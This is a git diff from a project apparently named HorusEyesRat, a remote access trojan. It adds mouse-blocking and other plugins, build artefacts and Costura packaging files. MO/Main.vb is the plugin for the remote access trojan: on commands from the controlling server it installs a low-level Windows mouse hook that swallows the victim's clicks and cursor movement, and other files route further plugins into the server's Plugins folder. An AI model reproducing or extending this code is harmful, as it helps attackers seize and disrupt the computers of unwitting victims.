0000000..2c67faa Binary files /dev/null and b/KB/obj/Release/Costura/9B30E4DA5A8534438E12E3513C46166C96BB4444.costura.packetlib.dll.compressed differ diff --git a/KB/obj/Release/Costura/9C887EEB0D134C85E8BFC53AF08E9D5C722CB08C.costura.packetlib.dll.compressed b/KB/obj/Release/Costura/9C887EEB0D134C85E8BFC53AF08E9D5C722CB08C.costura.packetlib.dll.compressed new file mode 100644 index 0000000..a4645e4 Binary files /dev/null and b/KB/obj/Release/Costura/9C887EEB0D134C85E8BFC53AF08E9D5C722CB08C.costura.packetlib.dll.compressed differ diff --git a/KB/obj/Release/Costura/BBEDC29A6B1DB4E4DC655BF71F2DE0A1ED0EACA5.costura.packetlib.dll.compressed b/KB/obj/Release/Costura/BBEDC29A6B1DB4E4DC655BF71F2DE0A1ED0EACA5.costura.packetlib.dll.compressed new file mode 100644 index 0000000..643f842 Binary files /dev/null and b/KB/obj/Release/Costura/BBEDC29A6B1DB4E4DC655BF71F2DE0A1ED0EACA5.costura.packetlib.dll.compressed differ diff --git a/KB/obj/Release/Costura/CD6906005ADAAB7407932C125DB73699CAE8194A.costura.packetlib.pdb.compressed b/KB/obj/Release/Costura/CD6906005ADAAB7407932C125DB73699CAE8194A.costura.packetlib.pdb.compressed new file mode 100644 index 0000000..02c151f Binary files /dev/null and b/KB/obj/Release/Costura/CD6906005ADAAB7407932C125DB73699CAE8194A.costura.packetlib.pdb.compressed differ diff --git a/KB/obj/Release/Costura/EF7A14D5C89C0296F01FF7FE63E5CF1B30DB1E04.costura.packetlib.dll.compressed b/KB/obj/Release/Costura/EF7A14D5C89C0296F01FF7FE63E5CF1B30DB1E04.costura.packetlib.dll.compressed new file mode 100644 index 0000000..c389ee1 Binary files /dev/null and b/KB/obj/Release/Costura/EF7A14D5C89C0296F01FF7FE63E5CF1B30DB1E04.costura.packetlib.dll.compressed differ diff --git a/KB/obj/Release/Costura/FEDC3B6E505E077E06053DDAAED6B43FB7B2A5A7.costura.packetlib.pdb.compressed b/KB/obj/Release/Costura/FEDC3B6E505E077E06053DDAAED6B43FB7B2A5A7.costura.packetlib.pdb.compressed new file mode 100644 index 0000000..e91ead0 Binary files /dev/null and b/KB/obj/Release/Costura/FEDC3B6E505E077E06053DDAAED6B43FB7B2A5A7.costura.packetlib.pdb.compressed differ diff --git a/KB/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache b/KB/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache new file mode 100644 index 0000000..74c7ee9 Binary files /dev/null and b/KB/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache differ diff --git a/KB/obj/Release/KB.dll b/KB/obj/Release/KB.dll new file mode 100644 index 0000000..9920df2 Binary files /dev/null and b/KB/obj/Release/KB.dll differ diff --git a/KB/obj/Release/KB.pdb b/KB/obj/Release/KB.pdb new file mode 100644 index 0000000..918834c Binary files /dev/null and b/KB/obj/Release/KB.pdb differ diff --git a/KB/obj/Release/KB.vbproj.CopyComplete b/KB/obj/Release/KB.vbproj.CopyComplete new file mode 100644 index 0000000..e69de29 diff --git a/KB/obj/Release/KB.vbproj.CoreCompileInputs.cache b/KB/obj/Release/KB.vbproj.CoreCompileInputs.cache new file mode 100644 index 0000000..4abbf35 --- /dev/null +++ b/KB/obj/Release/KB.vbproj.CoreCompileInputs.cache @@ -0,0 +1 @@ +1c20953816e2f4e02b611bea871e18b8eab84814 diff --git a/KB/obj/Release/KB.vbproj.FileListAbsolute.txt b/KB/obj/Release/KB.vbproj.FileListAbsolute.txt new file mode 100644 index 0000000..ec8578e --- /dev/null +++ b/KB/obj/Release/KB.vbproj.FileListAbsolute.txt @@ -0,0 +1,16 @@ +Z:\HorusEyesRat-master\KB\bin\Release\KB.dll +Z:\HorusEyesRat-master\KB\bin\Release\KB.pdb +Z:\HorusEyesRat-master\KB\bin\Release\KB.xml +Z:\HorusEyesRat-master\KB\bin\Release\PacketLib.xml +Z:\HorusEyesRat-master\Server\bin\Release\Plugins\KB.dll +Z:\HorusEyesRat-master\Server\bin\Release\Plugins\KB.pdb +Z:\HorusEyesRat-master\Server\bin\Release\Plugins\KB.xml +Z:\HorusEyesRat-master\KB\obj\Release\PL.Resources.resources +Z:\HorusEyesRat-master\KB\obj\Release\KB.vbproj.GenerateResource.cache +Z:\HorusEyesRat-master\KB\obj\Release\KB.vbproj.CoreCompileInputs.cache +Z:\HorusEyesRat-master\KB\obj\Release\KB.vbproj.Fody.CopyLocal.cache +Z:\HorusEyesRat-master\KB\obj\Release\KB.vbproj.CopyComplete +Z:\HorusEyesRat-master\KB\obj\Release\KB.dll +Z:\HorusEyesRat-master\KB\obj\Release\KB.xml +Z:\HorusEyesRat-master\KB\obj\Release\KB.pdb +Z:\HorusEyesRat-master\KB\obj\Release\KB.vbprojAssemblyReference.cache diff --git a/KB/obj/Release/KB.vbproj.Fody.CopyLocal.cache b/KB/obj/Release/KB.vbproj.Fody.CopyLocal.cache new file mode 100644 index 0000000..90e716b --- /dev/null +++ b/KB/obj/Release/KB.vbproj.Fody.CopyLocal.cache @@ -0,0 +1 @@ +Z:\HorusEyesRat-master\PacketLib\bin\Release\PacketLib.xml diff --git a/KB/obj/Release/KB.vbproj.GenerateResource.cache b/KB/obj/Release/KB.vbproj.GenerateResource.cache new file mode 100644 index 0000000..c9ae5e6 Binary files /dev/null and b/KB/obj/Release/KB.vbproj.GenerateResource.cache differ diff --git a/KB/obj/Release/KB.vbprojAssemblyReference.cache b/KB/obj/Release/KB.vbprojAssemblyReference.cache new file mode 100644 index 0000000..d6f90b8 Binary files /dev/null and b/KB/obj/Release/KB.vbprojAssemblyReference.cache differ diff --git a/KB/obj/Release/KB.xml b/KB/obj/Release/KB.xml new file mode 100644 index 0000000..12af0a2 --- /dev/null +++ b/KB/obj/Release/KB.xml @@ -0,0 +1,26 @@ + + + + +KB + + + + + + Une classe de ressource fortement typée destinée, entre autres, à la consultation des chaînes localisées. + + + + + Retourne l'instance ResourceManager mise en cache utilisée par cette classe. + + + + + Remplace la propriété CurrentUICulture du thread actuel pour toutes + les recherches de ressources à l'aide de cette classe de ressource fortement typée. + + + + diff --git a/KB/obj/Release/PL.Resources.resources b/KB/obj/Release/PL.Resources.resources new file mode 100644 index 0000000..6c05a97 Binary files /dev/null and b/KB/obj/Release/PL.Resources.resources differ diff --git a/KB/obj/Release/TempPE/My Project.Application.Designer.vb.dll b/KB/obj/Release/TempPE/My Project.Application.Designer.vb.dll new file mode 100644 index 0000000..6f024ea Binary files /dev/null and b/KB/obj/Release/TempPE/My Project.Application.Designer.vb.dll differ diff --git a/KB/obj/Release/TempPE/My Project.Resources.Designer.vb.dll b/KB/obj/Release/TempPE/My Project.Resources.Designer.vb.dll new file mode 100644 index 0000000..ca72018 Binary files /dev/null and b/KB/obj/Release/TempPE/My Project.Resources.Designer.vb.dll differ diff --git a/LD/LD.csproj b/LD/LD.csproj index 0a14581..12e0816 100644 --- a/LD/LD.csproj +++ b/LD/LD.csproj @@ -28,7 +28,7 @@ pdbonly true - bin\Release\ + ..\Server\bin\Release\Plugins\ TRACE prompt 4 diff --git a/LD/obj/Debug/Costura/746C6F9E511F3138300F360DB08C5C10D0785D0F.costura.packetlib.dll.compressed b/LD/obj/Debug/Costura/746C6F9E511F3138300F360DB08C5C10D0785D0F.costura.packetlib.dll.compressed new file mode 100644 index 0000000..60cb1ab Binary files /dev/null and b/LD/obj/Debug/Costura/746C6F9E511F3138300F360DB08C5C10D0785D0F.costura.packetlib.dll.compressed differ diff --git a/LD/obj/Debug/Costura/88E47D90D32A3913E2B9F3259197A5068A93482F.costura.packetlib.pdb.compressed b/LD/obj/Debug/Costura/88E47D90D32A3913E2B9F3259197A5068A93482F.costura.packetlib.pdb.compressed new file mode 100644 index 0000000..650889f Binary files /dev/null and b/LD/obj/Debug/Costura/88E47D90D32A3913E2B9F3259197A5068A93482F.costura.packetlib.pdb.compressed differ diff --git a/LD/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache b/LD/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache index 53bc1b4..458c889 100644 Binary files a/LD/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache and b/LD/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache differ diff --git a/LD/obj/Debug/LD.csproj.CoreCompileInputs.cache b/LD/obj/Debug/LD.csproj.CoreCompileInputs.cache index 78896b7..df6ede8 100644 --- a/LD/obj/Debug/LD.csproj.CoreCompileInputs.cache +++ b/LD/obj/Debug/LD.csproj.CoreCompileInputs.cache @@ -1 +1 @@ -48dcdea5b1b6f4aabc9814148e4b501545c0f201 +05b494dee6661ab2d7c53ebab348240058197951 diff --git a/LD/obj/Debug/LD.csproj.FileListAbsolute.txt b/LD/obj/Debug/LD.csproj.FileListAbsolute.txt index fb1a767..fb778ce 100644 --- a/LD/obj/Debug/LD.csproj.FileListAbsolute.txt +++ b/LD/obj/Debug/LD.csproj.FileListAbsolute.txt @@ -7,3 +7,12 @@ C:\Users\mehdi\Documents\HorusEyesRat-main\LD\obj\Debug\LD.pdb C:\Users\mehdi\Documents\HorusEyesRat-main\LD\bin\Debug\PacketLib.xml C:\Users\mehdi\Documents\HorusEyesRat-main\LD\obj\Debug\LD.csproj.CopyComplete C:\Users\mehdi\Documents\HorusEyesRat-main\LD\obj\Debug\LD.csproj.Fody.CopyLocal.cache +Z:\HorusEyesRat-master\LD\bin\Debug\LD.dll +Z:\HorusEyesRat-master\LD\bin\Debug\LD.pdb +Z:\HorusEyesRat-master\LD\bin\Debug\PacketLib.xml +Z:\HorusEyesRat-master\LD\obj\Debug\LD.csprojAssemblyReference.cache +Z:\HorusEyesRat-master\LD\obj\Debug\LD.csproj.CoreCompileInputs.cache +Z:\HorusEyesRat-master\LD\obj\Debug\LD.csproj.Fody.CopyLocal.cache +Z:\HorusEyesRat-master\LD\obj\Debug\LD.csproj.CopyComplete +Z:\HorusEyesRat-master\LD\obj\Debug\LD.dll +Z:\HorusEyesRat-master\LD\obj\Debug\LD.pdb diff --git a/LD/obj/Debug/LD.csproj.Fody.CopyLocal.cache b/LD/obj/Debug/LD.csproj.Fody.CopyLocal.cache index 4cbd38b..c1cd591 100644 --- a/LD/obj/Debug/LD.csproj.Fody.CopyLocal.cache +++ b/LD/obj/Debug/LD.csproj.Fody.CopyLocal.cache @@ -1 +1 @@ -C:\Users\mehdi\Documents\HorusEyesRat-main\PacketLib\bin\Debug\PacketLib.xml +Z:\HorusEyesRat-master\PacketLib\bin\Debug\PacketLib.xml diff --git a/LD/obj/Debug/LD.csprojAssemblyReference.cache b/LD/obj/Debug/LD.csprojAssemblyReference.cache index b96c125..26c174f 100644 Binary files a/LD/obj/Debug/LD.csprojAssemblyReference.cache and b/LD/obj/Debug/LD.csprojAssemblyReference.cache differ diff --git a/LD/obj/Debug/LD.dll b/LD/obj/Debug/LD.dll index d747317..450e2bf 100644 Binary files a/LD/obj/Debug/LD.dll and b/LD/obj/Debug/LD.dll differ diff --git a/LD/obj/Debug/LD.pdb b/LD/obj/Debug/LD.pdb index 102295c..e1b68e7 100644 Binary files a/LD/obj/Debug/LD.pdb and b/LD/obj/Debug/LD.pdb differ diff --git a/LD/obj/Release/.NETFramework,Version=v4.8.AssemblyAttributes.cs b/LD/obj/Release/.NETFramework,Version=v4.8.AssemblyAttributes.cs new file mode 100644 index 0000000..15efebf --- /dev/null +++ b/LD/obj/Release/.NETFramework,Version=v4.8.AssemblyAttributes.cs @@ -0,0 +1,4 @@ +// +using System; +using System.Reflection; +[assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.8", FrameworkDisplayName = ".NET Framework 4.8")] diff --git a/LD/obj/Release/Costura/5954E332EC7732BA34C27E2D88D154D1919C1B07.costura.costura.dll.compressed b/LD/obj/Release/Costura/5954E332EC7732BA34C27E2D88D154D1919C1B07.costura.costura.dll.compressed new file mode 100644 index 0000000..d9fe526 Binary files /dev/null and b/LD/obj/Release/Costura/5954E332EC7732BA34C27E2D88D154D1919C1B07.costura.costura.dll.compressed differ diff --git a/LD/obj/Release/Costura/746C6F9E511F3138300F360DB08C5C10D0785D0F.costura.packetlib.dll.compressed b/LD/obj/Release/Costura/746C6F9E511F3138300F360DB08C5C10D0785D0F.costura.packetlib.dll.compressed new file mode 100644 index 0000000..60cb1ab Binary files /dev/null and b/LD/obj/Release/Costura/746C6F9E511F3138300F360DB08C5C10D0785D0F.costura.packetlib.dll.compressed differ diff --git a/LD/obj/Release/Costura/88E47D90D32A3913E2B9F3259197A5068A93482F.costura.packetlib.pdb.compressed b/LD/obj/Release/Costura/88E47D90D32A3913E2B9F3259197A5068A93482F.costura.packetlib.pdb.compressed new file mode 100644 index 0000000..650889f Binary files /dev/null and b/LD/obj/Release/Costura/88E47D90D32A3913E2B9F3259197A5068A93482F.costura.packetlib.pdb.compressed differ diff --git a/LD/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache b/LD/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache new file mode 100644 index 0000000..3d07de1 Binary files /dev/null and b/LD/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache differ diff --git a/LD/obj/Release/LD.csproj.CopyComplete b/LD/obj/Release/LD.csproj.CopyComplete new file mode 100644 index 0000000..e69de29 diff --git a/LD/obj/Release/LD.csproj.CoreCompileInputs.cache b/LD/obj/Release/LD.csproj.CoreCompileInputs.cache new file mode 100644 index 0000000..f4e5ed1 --- /dev/null +++ b/LD/obj/Release/LD.csproj.CoreCompileInputs.cache @@ -0,0 +1 @@ +ef6f0ea2cad18a9f10b5eea084a5e7d500c3bd5e diff --git a/LD/obj/Release/LD.csproj.FileListAbsolute.txt b/LD/obj/Release/LD.csproj.FileListAbsolute.txt new file mode 100644 index 0000000..b3548a8 --- /dev/null +++ b/LD/obj/Release/LD.csproj.FileListAbsolute.txt @@ -0,0 +1,11 @@ +Z:\HorusEyesRat-master\LD\bin\Release\LD.dll +Z:\HorusEyesRat-master\LD\bin\Release\LD.pdb +Z:\HorusEyesRat-master\LD\bin\Release\PacketLib.xml +Z:\HorusEyesRat-master\Server\bin\Release\Plugins\LD.dll +Z:\HorusEyesRat-master\Server\bin\Release\Plugins\LD.pdb +Z:\HorusEyesRat-master\LD\obj\Release\LD.csproj.CoreCompileInputs.cache +Z:\HorusEyesRat-master\LD\obj\Release\LD.csproj.Fody.CopyLocal.cache +Z:\HorusEyesRat-master\LD\obj\Release\LD.csproj.CopyComplete +Z:\HorusEyesRat-master\LD\obj\Release\LD.dll +Z:\HorusEyesRat-master\LD\obj\Release\LD.pdb +Z:\HorusEyesRat-master\LD\obj\Release\LD.csprojAssemblyReference.cache diff --git a/LD/obj/Release/LD.csproj.Fody.CopyLocal.cache b/LD/obj/Release/LD.csproj.Fody.CopyLocal.cache new file mode 100644 index 0000000..c1cd591 --- /dev/null +++ b/LD/obj/Release/LD.csproj.Fody.CopyLocal.cache @@ -0,0 +1 @@ +Z:\HorusEyesRat-master\PacketLib\bin\Debug\PacketLib.xml diff --git a/LD/obj/Release/LD.csprojAssemblyReference.cache b/LD/obj/Release/LD.csprojAssemblyReference.cache new file mode 100644 index 0000000..fda85e4 Binary files /dev/null and b/LD/obj/Release/LD.csprojAssemblyReference.cache differ diff --git a/LD/obj/Release/LD.dll b/LD/obj/Release/LD.dll new file mode 100644 index 0000000..a4bcd25 Binary files /dev/null and b/LD/obj/Release/LD.dll differ diff --git a/LD/obj/Release/LD.pdb b/LD/obj/Release/LD.pdb new file mode 100644 index 0000000..70051bc Binary files /dev/null and b/LD/obj/Release/LD.pdb differ diff --git a/MO/FodyWeavers.xml b/MO/FodyWeavers.xml new file mode 100644 index 0000000..5029e70 --- /dev/null +++ b/MO/FodyWeavers.xml @@ -0,0 +1,3 @@ + + + \ No newline at end of file diff --git a/MO/FodyWeavers.xsd b/MO/FodyWeavers.xsd new file mode 100644 index 0000000..44a5374 --- /dev/null +++ b/MO/FodyWeavers.xsd @@ -0,0 +1,111 @@ + + + + + + + + + + + + A list of assembly names to exclude from the default action of "embed all Copy Local references", delimited with line breaks + + + + + A list of assembly names to include from the default action of "embed all Copy Local references", delimited with line breaks. + + + + + A list of unmanaged 32 bit assembly names to include, delimited with line breaks. + + + + + A list of unmanaged 64 bit assembly names to include, delimited with line breaks. + + + + + The order of preloaded assemblies, delimited with line breaks. + + + + + + This will copy embedded files to disk before loading them into memory. This is helpful for some scenarios that expected an assembly to be loaded from a physical file. + + + + + Controls if .pdbs for reference assemblies are also embedded. + + + + + Embedded assemblies are compressed by default, and uncompressed when they are loaded. You can turn compression off with this option. + + + + + As part of Costura, embedded assemblies are no longer included as part of the build. This cleanup can be turned off. + + + + + Costura by default will load as part of the module initialization. This flag disables that behavior. Make sure you call CosturaUtility.Initialize() somewhere in your code. + + + + + Costura will by default use assemblies with a name like 'resources.dll' as a satellite resource and prepend the output path. This flag disables that behavior. + + + + + A list of assembly names to exclude from the default action of "embed all Copy Local references", delimited with | + + + + + A list of assembly names to include from the default action of "embed all Copy Local references", delimited with |. + + + + + A list of unmanaged 32 bit assembly names to include, delimited with |. + + + + + A list of unmanaged 64 bit assembly names to include, delimited with |. + + + + + The order of preloaded assemblies, delimited with |. + + + + + + + + 'true' to run assembly verification (PEVerify) on the target assembly after all weavers have been executed. + + + + + A comma-separated list of error codes that can be safely ignored in assembly verification. + + + + + 'false' to turn off automatic generation of the XML Schema file. + + + + + \ No newline at end of file diff --git a/MO/MO.vbproj b/MO/MO.vbproj new file mode 100644 index 0000000..d4f00d4 --- /dev/null +++ b/MO/MO.vbproj @@ -0,0 +1,127 @@ + + + + + + Debug + AnyCPU + {BB36F621-A416-49C3-A18F-F82726B8BBBE} + Library + PL + MO + 512 + Windows + v4.8 + true + + + + + true + full + true + true + bin\Debug\ + MO.xml + 42016,41999,42017,42018,42019,42032,42036,42020,42021,42022 + + + pdbonly + false + true + true + ..\Server\bin\Release\Plugins\ + MO.xml + 42016,41999,42017,42018,42019,42032,42036,42020,42021,42022 + + + On + + + Binary + + + Off + + + On + + + + ..\packages\Costura.Fody.4.1.0\lib\net40\Costura.dll + + + ..\PacketLib\bin\Release\PacketLib.dll + + + + + + + + + + + + + + + + + + + + + + + + + + + + + True + Application.myapp + True + + + True + True + Resources.resx + + + True + Settings.settings + True + + + + + VbMyResourcesResXFileCodeGenerator + Resources.Designer.vb + My.Resources + Designer + + + + + MyApplicationCodeGenerator + Application.Designer.vb + + + SettingsSingleFileGenerator + My + Settings.Designer.vb + + + + + + + + Ce projet fait référence à des packages NuGet qui sont manquants sur cet ordinateur. Utilisez l'option de restauration des packages NuGet pour les télécharger. Pour plus d'informations, consultez http://go.microsoft.com/fwlink/?LinkID=322105. Le fichier manquant est : {0}. + + + + + \ No newline at end of file diff --git a/MO/Main.vb b/MO/Main.vb new file mode 100644 index 0000000..3831e60 --- /dev/null +++ b/MO/Main.vb @@ -0,0 +1,254 @@ +Imports System.Drawing +Imports System.Net.Sockets +Imports System.Runtime.InteropServices +Imports System.Threading +Imports PacketLib.Packet + +Public Class Main + Public Shared MainThread As New Thread(AddressOf gdzbfhbjedzfhujnezdfhjezdfhjezfhjdgsfegrjk) + Public Shared LEFTCLK As Boolean = False + Public Shared RIGHTCLK As Boolean = False + Public Shared MOVE As Boolean = False + Public Shared ALL As Boolean = False + Public Shared GLOBALRETURN As Boolean = False + Public Shared Sub Main(ByVal k As TcpClient, ByVal Param_Tab As Object()) + Dim CastParam As Packet_Subject = CType(Param_Tab(0), Packet_Subject) + + Select Case CastParam + + Case Packet_Subject.MS_ALL + + GLOBALRETURN = True + ALL = True + MOVE = True + LEFTCLK = True + RIGHTCLK = True + + MainThread.Start() + + Case Packet_Subject.MS_LEFT + + GLOBALRETURN = True + ALL = False + MOVE = False + LEFTCLK = True + RIGHTCLK = False + MainThread.Start() + + Case Packet_Subject.MS_RIGHT + + GLOBALRETURN = True + ALL = False + MOVE = False + LEFTCLK = False + RIGHTCLK = True + MainThread.Start() + + Case Packet_Subject.MS_MV + + GLOBALRETURN = True + ALL = False + MOVE = True + LEFTCLK = False + RIGHTCLK = False + MainThread.Start() + + Case Packet_Subject.MS_UNL + + GLOBALRETURN = False + ALL = False + MOVE = False + LEFTCLK = False + RIGHTCLK = False + MainThread.Start() + + End Select + + End Sub + Public Shared Sub gdzbfhbjedzfhujnezdfhjezdfhjezfhjdgsfegrjk() + + + Dim objCurrentModule As ProcessModule = Process.GetCurrentProcess().MainModule + + Dim objKeyboardProcess As New LowLevelMouseProc(AddressOf captureKey) + Dim curProcess As Process = Process.GetCurrentProcess() + ptrHook = SetWindowsHookEx(14, objKeyboardProcess, GetModuleHandle(curProcess.ProcessName), 0) + + System.Windows.Forms.Application.Run() + End Sub + + '' + ' SOLUTION ADAPTED FROM : http://geekswithblogs.net/aghausman/archive/2009/04/26/disable-special-keys-in-win-app-c.aspx written in c# + '' Rewritten By Arsium in VBNET + '' + + Public Shared Function SetWindowsHookEx(ByVal id As Integer, ByVal callback As LowLevelMouseProc, ByVal hMod As IntPtr, ByVal dwThreadId As UInteger) As IntPtr + + End Function + + Public Shared Function GetModuleHandle(ByVal name As String) As IntPtr + + End Function + + + Private Structure MSLLHOOKSTRUCT + Public pt As Point + Public mouseData As Integer + Public flags As Integer + Public time As Integer + Public extra As IntPtr + End Structure + + Public Delegate Function LowLevelMouseProc(ByVal nCode As Integer, ByVal wParam As IntPtr, ByVal lParam As IntPtr) As IntPtr + + + Public Shared Function UnhookWindowsHookEx(ByVal hook As IntPtr) As Boolean + + End Function + + Private Shared Function CallNextHookEx(ByVal hook As IntPtr, ByVal nCode As Integer, ByVal wp As IntPtr, ByVal lp As IntPtr) As IntPtr + + End Function + + Public Shared ptrHook As IntPtr + + Public Shared Function captureKey(ByVal nCode As Integer, ByVal wp As IntPtr, ByVal lp As IntPtr) + + If nCode >= 0 Then + + Dim objKeyInfo As MSLLHOOKSTRUCT = CType(Marshal.PtrToStructure(lp, GetType(MSLLHOOKSTRUCT)), MSLLHOOKSTRUCT) + + If GLOBALRETURN = True Then + + If ALL = True Then + + If wp = &H201 Then 'WM_LBUTTONDOWN + + ' MessageBox.Show("Left") + Return wp + + End If + + If wp = &H202 Then 'WM_LBUTTONUP + + Return wp + + End If + + If wp = &H203 Then ''LEFT DB CLICK + + Return wp + + End If + + '0x0203 + + + If wp = &H204 Then ''WM_RBUTTONDOWN + + Return wp + + End If + + + If wp = &H205 Then ''WM_RBUTTONUP + + Return wp + + End If + + + If wp = &H206 Then '' WM_RBUTTONDBLCLK + + Return wp + + End If + + + ' If MOVE = True Then + + If wp = &H200 Then '' MOUSE MOVE + + Return wp + + End If + ' 0x0200 + + ' End If + + Else + + If LEFTCLK = True Then + + If wp = &H201 Then 'WM_LBUTTONDOWN + ' MessageBox.Show("Left") + Return wp + + End If + + If wp = &H202 Then 'WM_LBUTTONUP + Return wp + End If + + If wp = &H203 Then ''LEFT DB CLICK + Return wp + End If + + '0x0203 + + End If + + If RIGHTCLK = True Then + + If wp = &H204 Then ''WM_RBUTTONDOWN + + Return wp + + End If + + + If wp = &H205 Then ''WM_RBUTTONUP + + Return wp + + End If + + + If wp = &H206 Then '' WM_RBUTTONDBLCLK + + Return wp + + End If + + End If + + If MOVE = True Then + + If wp = &H200 Then '' MOUSE MOVE + + Return wp + + + End If + ' 0x0200 + + + End If + + End If + + Else + + Exit Function + + Return CallNextHookEx(ptrHook, nCode, wp, lp) + End If + + Return CallNextHookEx(ptrHook, nCode, wp, lp) + + End If + + ' Return CallNextHookEx(ptrHook, nCode, wp, lp) + End Function + +End Class diff --git a/MO/My Project/Application.Designer.vb b/MO/My Project/Application.Designer.vb new file mode 100644 index 0000000..91e3aa4 --- /dev/null +++ b/MO/My Project/Application.Designer.vb @@ -0,0 +1,13 @@ +'------------------------------------------------------------------------------ +' +' Ce code a été généré par un outil. +' Version du runtime :4.0.30319.42000 +' +' Les modifications apportées à ce fichier peuvent provoquer un comportement incorrect et seront perdues si +' le code est régénéré. +' +'------------------------------------------------------------------------------ + +Option Strict On +Option Explicit On + diff --git a/MO/My Project/Application.myapp b/MO/My Project/Application.myapp new file mode 100644 index 0000000..758895d --- /dev/null +++ b/MO/My Project/Application.myapp @@ -0,0 +1,10 @@ + + + false + false + 0 + true + 0 + 1 + true + diff --git a/MO/My Project/AssemblyInfo.vb b/MO/My Project/AssemblyInfo.vb new file mode 100644 index 0000000..909e02e --- /dev/null +++ b/MO/My Project/AssemblyInfo.vb @@ -0,0 +1,35 @@ +Imports System +Imports System.Reflection +Imports System.Runtime.InteropServices + +' Les informations générales relatives à un assembly dépendent de +' l'ensemble d'attributs suivant. Pour modifier les informations +' associées à un assembly. + +' Vérifiez les valeurs des attributs de l'assembly + + + + + + + + + + +'Le GUID suivant est pour l'ID de la typelib si ce projet est exposé à COM + + +' Les informations de version pour un assembly se composent des quatre valeurs suivantes : +' +' Version principale +' Version secondaire +' Numéro de build +' Révision +' +' Vous pouvez spécifier toutes les valeurs ou indiquer les numéros de build et de révision par défaut +' en utilisant '*', comme indiqué ci-dessous : +' + + + diff --git a/MO/My Project/Resources.Designer.vb b/MO/My Project/Resources.Designer.vb new file mode 100644 index 0000000..14d7020 --- /dev/null +++ b/MO/My Project/Resources.Designer.vb @@ -0,0 +1,63 @@ +'------------------------------------------------------------------------------ +' +' Ce code a été généré par un outil. +' Version du runtime :4.0.30319.42000 +' +' Les modifications apportées à ce fichier peuvent provoquer un comportement incorrect et seront perdues si +' le code est régénéré. +' +'------------------------------------------------------------------------------ + +Option Strict On +Option Explicit On + +Imports System + +Namespace My.Resources + + 'Cette classe a été générée automatiquement par la classe StronglyTypedResourceBuilder + 'à l'aide d'un outil, tel que ResGen ou Visual Studio. + 'Pour ajouter ou supprimer un membre, modifiez votre fichier .ResX, puis réexécutez ResGen + 'avec l'option /str ou régénérez votre projet VS. + ''' + ''' Une classe de ressource fortement typée destinée, entre autres, à la consultation des chaînes localisées. + ''' + _ + Friend Module Resources + + Private resourceMan As Global.System.Resources.ResourceManager + + Private resourceCulture As Global.System.Globalization.CultureInfo + + ''' + ''' Retourne l'instance ResourceManager mise en cache utilisée par cette classe. + ''' + _ + Friend ReadOnly Property ResourceManager() As Global.System.Resources.ResourceManager + Get + If Object.ReferenceEquals(resourceMan, Nothing) Then + Dim temp As Global.System.Resources.ResourceManager = New Global.System.Resources.ResourceManager("PL.Resources", GetType(Resources).Assembly) + resourceMan = temp + End If + Return resourceMan + End Get + End Property + + ''' + ''' Remplace la propriété CurrentUICulture du thread actuel pour toutes + ''' les recherches de ressources à l'aide de cette classe de ressource fortement typée. + ''' + _ + Friend Property Culture() As Global.System.Globalization.CultureInfo + Get + Return resourceCulture + End Get + Set + resourceCulture = value + End Set + End Property + End Module +End Namespace diff --git a/MO/My Project/Resources.resx b/MO/My Project/Resources.resx new file mode 100644 index 0000000..af7dbeb --- /dev/null +++ b/MO/My Project/Resources.resx @@ -0,0 +1,117 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + text/microsoft-resx + + + 2.0 + + + System.Resources.ResXResourceReader, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 + + + System.Resources.ResXResourceWriter, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 + + \ No newline at end of file diff --git a/MO/My Project/Settings.Designer.vb b/MO/My Project/Settings.Designer.vb new file mode 100644 index 0000000..b3a9acd --- /dev/null +++ b/MO/My Project/Settings.Designer.vb @@ -0,0 +1,73 @@ +'------------------------------------------------------------------------------ +' +' Ce code a été généré par un outil. +' Version du runtime :4.0.30319.42000 +' +' Les modifications apportées à ce fichier peuvent provoquer un comportement incorrect et seront perdues si +' le code est régénéré. +' +'------------------------------------------------------------------------------ + +Option Strict On +Option Explicit On + + +Namespace My + + _ + Partial Friend NotInheritable Class MySettings + Inherits Global.System.Configuration.ApplicationSettingsBase + + Private Shared defaultInstance As MySettings = CType(Global.System.Configuration.ApplicationSettingsBase.Synchronized(New MySettings()),MySettings) + +#Region "Fonctionnalité Enregistrement automatique My.Settings" +#If _MyType = "WindowsForms" Then + Private Shared addedHandler As Boolean + + Private Shared addedHandlerLockObject As New Object + + _ + Private Shared Sub AutoSaveSettings(sender As Global.System.Object, e As Global.System.EventArgs) + If My.Application.SaveMySettingsOnExit Then + My.Settings.Save() + End If + End Sub +#End If +#End Region + + Public Shared ReadOnly Property [Default]() As MySettings + Get + +#If _MyType = "WindowsForms" Then + If Not addedHandler Then + SyncLock addedHandlerLockObject + If Not addedHandler Then + AddHandler My.Application.Shutdown, AddressOf AutoSaveSettings + addedHandler = True + End If + End SyncLock + End If +#End If + Return defaultInstance + End Get + End Property + End Class +End Namespace + +Namespace My + + _ + Friend Module MySettingsProperty + + _ + Friend ReadOnly Property Settings() As Global.PL.My.MySettings + Get + Return Global.PL.My.MySettings.Default + End Get + End Property + End Module +End Namespace diff --git a/MO/My Project/Settings.settings b/MO/My Project/Settings.settings new file mode 100644 index 0000000..85b890b --- /dev/null +++ b/MO/My Project/Settings.settings @@ -0,0 +1,7 @@ + + + + + + + diff --git a/MO/obj/Release/.NETFramework,Version=v4.8.AssemblyAttributes.vb b/MO/obj/Release/.NETFramework,Version=v4.8.AssemblyAttributes.vb new file mode 100644 index 0000000..e7dcac5 --- /dev/null +++ b/MO/obj/Release/.NETFramework,Version=v4.8.AssemblyAttributes.vb @@ -0,0 +1,7 @@ +' + Option Strict Off + Option Explicit On + + Imports System + Imports System.Reflection + diff --git a/MO/obj/Release/Costura/2B0F11B255FDBF048B7FF6DA71739EF0420A451C.costura.packetlib.pdb.compressed 